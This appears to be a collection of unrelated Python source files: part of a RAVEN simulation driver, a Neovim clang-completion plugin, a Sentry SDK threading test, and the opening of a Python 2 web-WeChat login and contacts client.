self.runInfoDict['clusterParameters'].extend(splitCommand(element.text)) #extend to allow adding parameters at different points.
elif element.tag == 'mode' :
self.runInfoDict['mode'] = element.text.strip().lower()
#parallel environment
if self.runInfoDict['mode'] in self.__modeHandlerDict:
self.__modeHandler = self.__modeHandlerDict[self.runInfoDict['mode']](self)
self.__modeHandler.XMLread(element)
else:
self.raiseAnError(IOError,"Unknown mode "+self.runInfoDict['mode'])
elif element.tag == 'expectedTime':
self.runInfoDict['expectedTime' ] = element.text.strip()
elif element.tag == 'Sequence':
for stepName in element.text.split(','):
self.stepSequenceList.append(stepName.strip())
elif element.tag == 'DefaultInputFile':
self.runInfoDict['DefaultInputFile'] = element.text.strip()
elif element.tag == 'CustomMode' :
modeName = element.text.strip()
modeClass = element.attrib["class"]
modeFile = element.attrib["file"]
#XXX This depends on if the working directory has been set yet.
# So switching the order of WorkingDir and CustomMode can
# cause different results.
modeFile = modeFile.replace("%BASE_WORKING_DIR%",self.runInfoDict['WorkingDir'])
modeFile = modeFile.replace("%FRAMEWORK_DIR%",self.runInfoDict['FrameworkDir'])
modeDir, modeFilename = os.path.split(modeFile)
if modeFilename.endswith(".py"):
modeModulename = modeFilename[:-3]
else:
modeModulename = modeFilename
os.sys.path.append(modeDir)
module = __import__(modeModulename)
if modeName in self.__modeHandlerDict:
self.raiseAWarning("duplicate mode definition " + modeName)
self.__modeHandlerDict[modeName] = module.__dict__[modeClass]
else:
self.raiseAnError(IOError,'RunInfo element "'+element.tag +'" unknown!')
def printDicts(self):
"""
utility function capable to print a summary of the dictionaries
@ In, None
@ Out, None
"""
def __prntDict(Dict,msg):
"""utility function capable to print a dictionary"""
for key in Dict:
msg+=key+'= '+str(Dict[key])+'\n'
return msg
msg=''
msg=__prntDict(self.runInfoDict,msg)
msg=__prntDict(self.stepsDict,msg)
msg=__prntDict(self.dataDict,msg)
msg=__prntDict(self.samplersDict,msg)
msg=__prntDict(self.modelsDict,msg)
msg=__prntDict(self.metricsDict,msg)
#msg=__prntDict(self.testsDict,msg)
msg=__prntDict(self.filesDict,msg)
msg=__prntDict(self.dataBasesDict,msg)
msg=__prntDict(self.outStreamsDict,msg)
msg=__prntDict(self.entityModules,msg)
msg=__prntDict(self.entities,msg)
self.raiseADebug(msg)
def run(self):
"""
Run the simulation
@ In, None
@ Out, None
"""
#to do list
#can we remove the check on the existence of the file, it might make more sense just to check in case they are input and before the step they are used
self.raiseADebug('entering the run')
#controlling the PBS environment
remoteRunCommand = self.__modeHandler.remoteRunCommand(dict(self.runInfoDict))
if remoteRunCommand is not None:
subprocess.call(args=remoteRunCommand["args"],
cwd=remoteRunCommand.get("cwd", None),
env=remoteRunCommand.get("env", None))
return
#loop over the steps of the simulation
for stepName in self.stepSequenceList:
stepInstance = self.stepsDict[stepName] #retrieve the instance of the step
self.raiseAMessage('-'*2+' Beginning step {0:50}'.format(stepName+' of type: '+stepInstance.type)+2*'-')#,color='green')
self.runInfoDict['stepName'] = stepName #provide the name of the step to runInfoDict
stepInputDict = {} #initialize the input dictionary for a step. Never use an old one!!!!!
stepInputDict['Input' ] = [] #set the Input to an empty list
stepInputDict['Output'] = [] #set the Output to an empty list
#fill the take a a step input dictionary just to recall: key= role played in the step b= Class, c= Type, d= user given name
for [key,b,c,d] in stepInstance.parList:
#Only for input and output we allow more than one object passed to the step, so for those we build a list
if key == 'Input' or key == 'Output':
stepInputDict[key].append(self.entities[b][d])
else:
stepInputDict[key] = self.entities[b][d]
#add the global objects
stepInputDict['jobHandler'] = self.jobHandler
#generate the needed assembler to send to the step
for key in stepInputDict.keys():
if type(stepInputDict[key]) == list:
stepindict = stepInputDict[key]
else:
stepindict = [stepInputDict[key]]
# check assembler. NB. If the assembler refers to an internal object the relative dictionary
# needs to have the format {'internal':[(None,'variableName'),(None,'variable name')]}
for stp in stepindict:
self.generateAllAssemblers(stp)
#if 'Sampler' in stepInputDict.keys(): stepInputDict['Sampler'].generateDistributions(self.distributionsDict)
#running a step
stepInstance.takeAstep(stepInputDict)
#---------------here what is going on? Please add comments-----------------
for output in stepInputDict['Output']:
if self.FIXME:
self.raiseAMessage('This is for the filter, it needs to go when the filtering strategy is done')
if "finalize" in dir(output):
output.finalize()
self.raiseAMessage('-'*2+' End step {0:50} '.format(stepName+' of type: '+stepInstance.type)+2*'-'+'\n')#,color='green')
self.jobHandler.shutdown()
self.messageHandler.printWarnings()
# implicitly, the job finished successfully if we got here.
self.writeStatusFile()
self.raiseAMessage('Run complete!', forcePrint=True)
def generateAllAssemblers(self, objectInstance):
"""
This method is used to generate all assembler objects at the Step construction stage
@ In, objectInstance, Instance, Instance of RAVEN entity, i.e. Input, Sampler, Model
@ Out, None
"""
if "whatDoINeed" in dir(objectInstance):
neededobjs = {}
neededObjects = objectInstance.whatDoINeed()
for mainClassStr in neededObjects.keys():
if mainClassStr not in self.entities.keys() and mainClassStr != 'internal':
self.raiseAnError(IOError,'Main Class '+mainClassStr+' needed by '+stp.name + ' unknown!')
neededobjs[mainClassStr] = {}
for obj in neededObjects[mainClassStr]:
if obj[1] in vars(self):
neededobjs[mainClassStr][obj[1]] = vars(self)[obj[1]]
elif obj[1] in self.entities[mainClassStr].keys():
if obj[0]:
if obj[0] not in self.entities[mainClassStr][obj[1]].type:
self.raiseAnError(IOError,'Type of requested object '+obj[1]+' does not match the actual type!'+ obj[0] + ' != ' + self.entities[mainClassStr][obj[1]].type)
neededobjs[mainClassStr][obj[1]] = self.entities[mainClassStr][obj[1]]
self.generateAllAssemblers(neededobjs[mainClassStr][obj[1]])
elif obj[1] in 'all':
# if 'all' we get all the objects of a certain 'mainClassStr'
for allObject in self.entities[mainClassStr]:
neededobjs[mainClassStr][allObject] = self.entities[mainClassStr][allObject]
else:
self.raiseAnError(IOError,'Requested object <{n}> is not part of the Main Class <{m}>!'
.format(n=obj[1], m=mainClassStr) +
'\nOptions are:', self.entities[mainClassStr].keys())
objectInstance.generateAssembler(neededobjs)
def clearStatusFile(self):
"""
Remove the status file from disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
try:
os.remove('.ravenStatus')
except OSError as e:
if os.path.isfile('.ravenStatus'):
self.raiseAWarning(f'RAVEN status file detected but not removable! Got: "{e}"')
def writeStatusFile(self):
"""
Write a status file to disk so we can really tell when RAVEN has successfully finished.
This doesn't seem to be a very robust strategy, but it is working for now.
@ In, None
@ Out, None
"""
with open('.ravenStatus', 'w') as f:
f.writelines('Success')
|
ncm2_pyclang_proc.py
|
# -*- coding: utf-8 -*-
from ncm2 import Ncm2Source, getLogger, Popen
import subprocess
import re
from os.path import dirname
from os import path, scandir
import vim
import json
import shlex
import time
import threading
import queue
import traceback
from distutils.spawn import find_executable
import sys
sys.path.insert(0, path.join(dirname(__file__), '3rd'))
from ncm2_pyclang import args_from_cmake, args_from_clang_complete, args_from_kbuild
from clang import cindex
from clang.cindex import CodeCompletionResult, CompletionString, SourceLocation, Cursor, File, Diagnostic
logger = getLogger(__name__)
class ErrTaskCancel(Exception):
pass
class Source(Ncm2Source):
def __init__(self, nvim):
Ncm2Source.__init__(self, nvim)
library_path = nvim.vars['ncm2_pyclang#library_path']
if path.isdir(library_path):
cindex.Config.set_library_path(library_path)
elif path.isfile(library_path):
cindex.Config.set_library_file(library_path)
cindex.Config.set_compatibility_check(False)
self.cmpl_index = cindex.Index.create(excludeDecls=False)
self.goto_index = cindex.Index.create(excludeDecls=False)
self.cmpl_tu = {}
self.goto_tu = {}
self.queue = queue.Queue()
self.worker = threading.Thread(target=self.worker_loop)
self.worker.daemon = True
self.worker.start()
gcc_path = nvim.vars['ncm2_pyclang#gcc_path']
auto_detect = nvim.vars['ncm2_pyclang#detect_sys_inc_args']
sys_inc = {}
gcc_exe = find_executable(gcc_path)
if auto_detect and gcc_exe:
sys_inc['cpp'] = self.get_system_include(gcc_exe, ['-xc++'])
sys_inc['c'] = self.get_system_include(gcc_exe, ['-xc'])
else:
if auto_detect:
# warning if auto detection failed
nvim.call('ncm2_pyclang#warn', 'g:ncm2_pyclang#gcc_path(' + gcc_path \
+ ' exe not found, use ncm2_pyclang#sys_inc_args_fallback')
sys_inc = nvim.vars['ncm2_pyclang#sys_inc_args_fallback']
self.args_system_include = sys_inc
def get_system_include(self, gcc, args):
# $ gcc -xc++ -E -Wp,-v -
# ignoring duplicate directory "/usr/include/x86_64-linux-gnu/c++/7"
# ignoring nonexistent directory "/usr/local/include/x86_64-linux-gnu"
# ignoring nonexistent directory "/usr/lib/gcc/x86_64-linux-gnu/7/../../../../x86_64-linux-gnu/include"
# #include "..." search starts here:
# #include <...> search starts here:
# /usr/include/c++/7
# /usr/include/x86_64-linux-gnu/c++/7
# /usr/include/c++/7/backward
# /usr/lib/gcc/x86_64-linux-gnu/7/include
# /usr/local/include
# /usr/lib/gcc/x86_64-linux-gnu/7/include-fixed
# /usr/include/x86_64-linux-gnu
# /usr/include
# End of search list.
args += ['-E', '-Wp,-v', '-']
gcc_is_cygwin = sys.platform == 'win32'
# Gcc is installed on Cygwin or MinGW, we need to prefix the include
# directories with cygwin/mingw base path
prefix = ''
if gcc_is_cygwin:
gcc_dir = dirname(gcc)
if gcc_dir.endswith('\\usr\\bin'):
prefix = gcc_dir[ : len(gcc_dir) - len('usr\\bin')]
elif gcc_dir.endswith('\\bin'):
prefix = gcc_dir[ : len(gcc_dir) - len('bin')]
proc = Popen(args=[gcc] + args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = proc.communicate('', timeout=2)
errdata = errdata.decode()
lines = errdata.split('\n')
res = []
for line in lines:
if line.startswith(' /'):
inc_dir = line.strip()
res += ['-isystem', prefix + inc_dir]
# cygwin uses symlink /usr/lib -> /lib, the directory cannot be
# accessed with Windows file explorer
if gcc_is_cygwin and inc_dir.startswith('/usr/lib/'):
res += ['-isystem', prefix + inc_dir.replace('/usr/lib/', '/lib/')]
logger.debug('system include: %s', res)
return res
def join_queue(self):
if self.worker.is_alive() and \
self.worker is not threading.current_thread():
self.queue.join()
def worker_loop(self):
while True:
name, task = self.queue.get()
if task is None:
break
logger.info('begin task %s', name)
try:
task()
logger.info('task %s finished', name)
except ErrTaskCancel as ex:
logger.info('task %s canceled, %s', name, ex)
except Exception as ex:
traceback.print_exc()
logger.exception('exception: %s', ex)
finally:
self.queue.task_done()
def notify(self, method: str, *args):
self.nvim.call(method, *args, async_=True)
def get_args_dir(self, data):
self.join_queue()
context = data['context']
cwd = data['cwd']
database_path = data['database_path']
filepath = context['filepath']
args_file_path = data['args_file_path']
args, run_dir = args_from_cmake(filepath, cwd, database_path)
if args is None:
args, run_dir = args_from_kbuild(filepath, cwd)
if args is None:
args, run_dir = args_from_clang_complete(filepath, cwd, args_file_path)
if args is None:
args = []
if run_dir is None:
run_dir = cwd
if context['scope'] == 'cpp':
args.append('-xc++')
stdinc = 'cpp'
elif context['filetype'] == 'cpp':
args.append('-xc++')
stdinc = 'cpp'
else:
args.append('-xc')
stdinc = 'c'
if '-nostdinc' not in args:
args += self.args_system_include[stdinc]
return [args, run_dir]
def cache_add(self, data, lines):
self.join_queue()
self.do_cache_add(data, lines, True)
self.do_cache_add(data, lines, False)
def do_cache_add(self, data, lines, for_completion):
context = data['context']
src = self.get_src("\n".join(lines), context)
filepath = context['filepath']
changedtick = context['changedtick']
args, directory = self.get_args_dir(data)
start = time.time()
if for_completion:
cache = self.cmpl_tu
else:
cache = self.goto_tu
check = dict(args=args, directory=directory)
if filepath in cache:
item = cache[filepath]
if check == item['check']:
tu = item['tu']
if changedtick == item['changedtick']:
logger.info("changedtick is the same, skip reparse")
return
self.reparse_tu(tu, filepath, src)
logger.debug("cache_add reparse existing done")
return
del cache[filepath]
item = {}
item['check'] = check
item['changedtick'] = changedtick
tu = self.create_tu(filepath, args, directory, src,
for_completion=for_completion)
item['tu'] = tu
cache[filepath] = item
end = time.time()
logger.debug("cache_add done cmpl[%s]. time: %s",
for_completion,
end - start)
def cache_del(self, filepath):
self.join_queue()
if filepath in self.cmpl_tu:
del self.cmpl_tu[filepath]
logger.info('completion cache %s has been removed', filepath)
if filepath in self.goto_tu:
del self.goto_tu[filepath]
logger.info('goto cache %s has been removed', filepath)
def get_tu(self, filepath, args, directory, src, for_completion=False):
if for_completion:
cache = self.cmpl_tu
else:
cache = self.goto_tu
check = dict(args=args, directory=directory)
if filepath in cache:
item = cache[filepath]
tu = item['tu']
if check == item['check']:
logger.info("%s tu is cached", filepath)
self.reparse_tu(tu, filepath, src)
return item['tu']
logger.info("%s tu invalidated by check %s -> %s",
filepath, check, item['check'])
self.cache_del(filepath)
logger.info("cache miss")
return self.create_tu(filepath,
args,
directory,
src,
for_completion=for_completion)
def create_tu(self, filepath, args, directory, src, for_completion):
CXTranslationUnit_KeepGoing = 0x200
CXTranslationUnit_CreatePreambleOnFirstParse = 0x100
args = ['-working-directory=' + directory] + args
if not for_completion:
flags = cindex.TranslationUnit.PARSE_PRECOMPILED_PREAMBLE | \
cindex.TranslationUnit.PARSE_INCOMPLETE | \
CXTranslationUnit_CreatePreambleOnFirstParse | \
cindex.TranslationUnit.PARSE_DETAILED_PROCESSING_RECORD | \
CXTranslationUnit_KeepGoing
else:
flags = cindex.TranslationUnit.PARSE_PRECOMPILED_PREAMBLE | \
cindex.TranslationUnit.PARSE_INCOMPLETE | \
CXTranslationUnit_CreatePreambleOnFirstParse | \
cindex.TranslationUnit.PARSE_CACHE_COMPLETION_RESULTS | \
cindex.TranslationUnit.PARSE_SKIP_FUNCTION_BODIES | \
CXTranslationUnit_KeepGoing
logger.info("flags %s", flags)
unsaved = (filepath, src)
if for_completion:
index = self.cmpl_index
else:
index = self.goto_index
tu = index.parse(filepath, args, [unsaved], flags)
return tu
def reparse_tu(self, tu, filepath, src):
unsaved = (filepath, src)
tu.reparse([unsaved])
include_pat = re.compile(r'^\s*#include\s+["<]([^"<]*)$')
include_base_pat = re.compile(r'([^/"<]*)$')
def get_include_completions(self, data, args, directory, inc_typed):
context = data['context']
includes = []
next_is_include = False
opts = ['-I', '-isystem', '-internal-isystem',
'-internal-externc-isystem']
for arg in args:
if not next_is_include:
if arg in opts:
next_is_include = True
continue
for opt in opts:
if arg.startswith(opt):
start = len(opt)
if start > 2:
start += 1
includes.append(arg[start:])
break
continue
includes.append(arg)
next_is_include = False
includes = [path.normpath(path.join(directory, inc))
for inc in includes]
# current file path
if context['filepath']:
includes.append(dirname(context['filepath']))
# remove duplicate
includes = list(set(includes))
logger.debug("includes to search: %s", includes)
matches = []
matcher = self.matcher_get(context['matcher'])
sub_dir = dirname(inc_typed) # type: str
sub_dir = sub_dir.strip('/')
base = self.include_base_pat.search(inc_typed).group(1)
for inc in includes:
try:
for entry in scandir(path.join(inc, sub_dir)):
name = entry.name
match = self.match_formalize(context, name)
match['menu'] = path.join(inc, sub_dir, name)
if entry.is_dir():
match['menu'] += '/'
if not matcher(base, match):
continue
matches.append(match)
except:
logger.exception('scandir failed for %s', inc)
startccol = context['ccol'] - len(base)
cb = lambda: self.complete(context, startccol, matches)
self.nvim.async_call(cb)
def on_complete(self, context, data, lines):
self.on_complete_context_id = context['context_id']
self.queue.put(['on_complete',
lambda: self.on_complete_task(context, data, lines)])
def on_complete_task(self, context, data, lines):
context_id = context['context_id']
def check_context_id(info, *args):
if context_id != self.on_complete_context_id:
raise ErrTaskCancel(info % (*args,))
data['context'] = context
src = self.get_src("\n".join(lines), context)
filepath = context['filepath']
startccol = context['startccol']
bcol = context['bcol']
lnum = context['lnum']
base = context['base']
typed = context['typed']
check_context_id('get_args_dir')
args, directory = self.get_args_dir(data)
inc_match = self.include_pat.search(typed)
if inc_match:
self.get_include_completions(data,
args,
directory,
inc_match.group(1))
return
start = time.time()
check_context_id('get_tu')
tu = self.get_tu(filepath, args, directory, src)
check_context_id('codeComplete')
unsaved = [filepath, src]
cr = tu.codeComplete(filepath,
lnum,
bcol,
[unsaved],
include_macros=True,
include_code_patterns=True)
results = cr.results
cr_end = time.time()
matcher = self.matcher_get(context['matcher'])
matches = []
for i, res in enumerate(results):
now = time.time()
check_context_id('complete result %s/%s', i + 1, len(results))
item = self.format_complete_item(context, matcher, base, res)
if item is None:
continue
# filter it's kind of useless for completion
if item['word'].startswith('operator '):
continue
item = self.match_formalize(context, item)
if not matcher(base, item):
continue
matches.append(item)
end = time.time()
logger.debug("total time: %s, codeComplete time: %s, matches %s -> %s",
end - start, cr_end - start, len(results), len(matches))
cb = lambda: self.complete(context, startccol, matches)
self.nvim.async_call(cb)
def format_complete_item(self, context, matcher, base, result):
result_type = None
word = ''
snippet = ''
info = ''
def roll_out_optional(chunks: CompletionString):
result = []
word = ""
for chunk in chunks:
if chunk.isKindInformative():
continue
if chunk.isKindResultType():
continue
if chunk.isKindTypedText():
continue
word += chunk.spelling
if chunk.isKindOptional():
result += roll_out_optional(chunk.string)
return [word] + result
placeholder_num = 1
for chunk in result.string:
if chunk.isKindTypedText():
# filter the matches earlier for performance
tmp = self.match_formalize(context, chunk.spelling)
if not matcher(base, tmp):
return None
word = chunk.spelling
if chunk.isKindInformative():
continue
if chunk.isKindResultType():
result_type = chunk
continue
chunk_text = chunk.spelling
if chunk.isKindOptional():
for arg in roll_out_optional(chunk.string):
snippet += self.lsp_snippet_placeholder(
placeholder_num, arg)
placeholder_num += 1
info += "[" + arg + "]"
elif chunk.isKindPlaceHolder():
snippet += self.lsp_snippet_placeholder(
placeholder_num, chunk_text)
placeholder_num += 1
info += chunk_text
else:
snippet += chunk_text
info += chunk_text
menu = info
if result_type:
result_text = result_type.spelling
menu = result_text + " " + menu
completion = dict()
completion['word'] = word
ud = {}
if snippet != word:
ud['is_snippet'] = 1
ud['snippet'] = snippet
completion['user_data'] = ud
completion['menu'] = menu
completion['info'] = info
completion['dup'] = 1
return completion
def lsp_snippet_placeholder(self, num, txt=''):
txt = txt.replace('\\', '\\\\')
txt = txt.replace('$', r'\$')
txt = txt.replace('}', r'\}')
if txt == '':
return '${%s}' % num
return '${%s:%s}' % (num, txt)
def find_declaration(self, data, lines):
self.join_queue()
context = data['context']
src = self.get_src("\n".join(lines), context)
filepath = context['filepath']
bcol = context['bcol']
lnum = context['lnum']
args, directory = self.get_args_dir(data)
tu = self.get_tu(filepath, args, directory, src)
f = File.from_name(tu, filepath)
location = SourceLocation.from_position(tu, f, lnum, bcol)
cursor = Cursor.from_location(tu, location)
defs = [cursor.get_definition(), cursor.referenced]
for d in defs:
if d is None:
logger.info("d None")
continue
d_loc = d.location
if d_loc.file is None:
logger.info("location.file None")
continue
ret = {}
ret['file'] = d_loc.file.name
ret['lnum'] = d_loc.line
ret['bcol'] = d_loc.column
return ret
# we failed finding the declaration, maybe there's some syntax error
# stopping us. Report it to the user.
logger.info('reading Diagnostic for this tu, args: %s', args)
for diag in tu.diagnostics:
# type: Diagnostic
if diag.severity < diag.Error:
pass
self.nvim.call('ncm2_pyclang#error', diag.format())
return {}
source = Source(vim)
on_complete = source.on_complete
cache_add = source.cache_add
find_declaration = source.find_declaration
cache_del = source.cache_del
get_args_dir = source.get_args_dir
|
test_contextvars.py
|
import pytest
import random
import time
from sentry_sdk.utils import _is_threading_local_monkey_patched
@pytest.mark.forked
def test_thread_local_is_patched(maybe_monkeypatched_threading):
if maybe_monkeypatched_threading is None:
assert not _is_threading_local_monkey_patched()
else:
assert _is_threading_local_monkey_patched()
@pytest.mark.forked
def test_leaks(maybe_monkeypatched_threading):
import threading
# Need to explicitly call _get_contextvars because the SDK has already
# decided upon gevent on import.
from sentry_sdk import utils
_, ContextVar = utils._get_contextvars()
ts = []
var = ContextVar("test_contextvar_leaks")
success = []
def run():
value = int(random.random() * 1000)
var.set(value)
for _ in range(100):
time.sleep(0)
assert var.get(None) == value
success.append(1)
for _ in range(20):
t = threading.Thread(target=run)
t.start()
ts.append(t)
for t in ts:
t.join()
assert len(success) == 20
|
weixin.py
|
#!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import subprocess
import random
import multiprocessing
import platform
import logging
import httplib
import datetime
from collections import defaultdict
from urlparse import urlparse
from lxml import html
from name_dict import name_dict
from name_dict import name_abbr
from id_group import id_dict
#import pdb
print sys.getdefaultencoding()
reload(sys)
sys.setdefaultencoding('utf8')
print sys.getdefaultencoding()
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
memberNum = 15
state_in = [0 for i in range(memberNum)]
date_time_init = datetime.datetime.now() - datetime.timedelta(2)
time_init_temp = date_time_init.strftime('%Y-%m-%d %H:%M')
time_init = datetime.datetime.strptime(time_init_temp, '%Y-%m-%d %H:%M')
last_login = [time_init for i in range(memberNum)]
online_time = [[datetime.timedelta(0) for i in range(memberNum)] for i in range(7)]
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # 好友
self.GroupList = [] # 群
self.GroupMemeberList = [] # 群友
self.PublicUsersList = [] # 公众号/服务号
self.SpecialUsersList = [] # 特殊账号
self.autoReplyMode = False
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # 同步最短时间间隔(单位:秒)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
if data == '':
return False
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
def genQRCode(self):
#return self._showQRCodeImg()
if sys.platform.startswith('win'):
self._showQRCodeImg('win')
elif sys.platform.find('darwin') >= 0:
self._showQRCodeImg('macos')
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self, os1):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
if data == '':
return
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
if os1 == 'win':
os.startfile(QRCODE_PATH)
elif os1 == 'macos':
subprocess.call(["open", QRCODE_PATH])
else:
return
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
if data == '':
return False
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
if data == '':
return False
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
if dic == '':
return False
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
if dic == '':
return False
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
if dic == '':
return False
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
if Contact['VerifyFlag'] & 8 != 0: # 公众号/服务号
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
elif Contact['UserName'] in SpecialUsers: # 特殊账号
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
elif '@@' in Contact['UserName']: # 群聊
ContactList.remove(Contact)
self.GroupList.append(Contact)
elif Contact['UserName'] == self.User['UserName']: # 自己
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
if dic == '':
return False
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
if dic == '':
return None
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'wx2.qq.com',
'webpush.wx2.qq.com',
'wx8.qq.com',
'webpush.wx8.qq.com',
'qq.com',
'webpush.wx.qq.com',
'web2.wechat.com',
'webpush.web2.wechat.com',
'wechat.com',
'webpush.web.wechat.com',
'webpush.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush.wx.qq.com',
